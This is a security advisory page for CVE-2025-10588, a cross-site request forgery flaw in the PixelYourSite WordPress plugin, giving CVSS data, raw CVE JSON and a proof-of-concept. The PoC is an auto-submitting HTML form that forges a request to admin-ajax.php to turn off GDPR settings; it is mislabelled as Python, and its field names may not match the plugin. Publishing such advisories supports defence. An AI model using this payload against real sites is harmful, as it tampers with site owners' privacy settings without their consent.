Security Vulnerability Report
δΈ­ζ–‡
CVE-2025-10588 CVSS 4.3 MEDIUM

CVE-2025-10588

Published: 2025-10-22 07:15:33
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The PixelYourSite – Your smart PIXEL (TAG) & API Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 11.1.2. This is due to missing or incorrect nonce validation on the adminEnableGdprAjax() function. This makes it possible for unauthenticated attackers to modify GDPR settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

PixelYourSite <= 11.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-10588 PoC - PixelYourSite CSRF Vulnerability Vulnerable function: adminEnableGdprAjax() Affected versions: <= 11.1.2 --> <html> <head><title>CVE-2025-10588 PoC</title></head> <body> <!-- Auto-submit form to exploit CSRF in adminEnableGdprAjax() --> <form id="csrf-form" action="https://target-wordpress-site.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="adminEnableGdprAjax" /> <!-- Modify GDPR settings payload --> <input type="hidden" name="gdpr_enabled" value="false" /> <input type="hidden" name="gdpr_default_consent" value="accept" /> <input type="hidden" name="gdpr_facebook" value="disabled" /> <input type="hidden" name="gdpr_google_analytics" value="disabled" /> <input type="hidden" name="gdpr_pinterest" value="disabled" /> </form> <script> // Auto-submit the form when the page loads document.getElementById('csrf-form').submit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10588", "sourceIdentifier": "[email protected]", "published": "2025-10-22T07:15:32.603", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The PixelYourSite – Your smart PIXEL (TAG) & API Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 11.1.2. This is due to missing or incorrect nonce validation on the adminEnableGdprAjax() function. This makes it possible for unauthenticated attackers to modify GDPR settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3379001/pixelyoursite", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-10588/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/53c25e24-fac6-404c-be6c-678a383b48a1?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.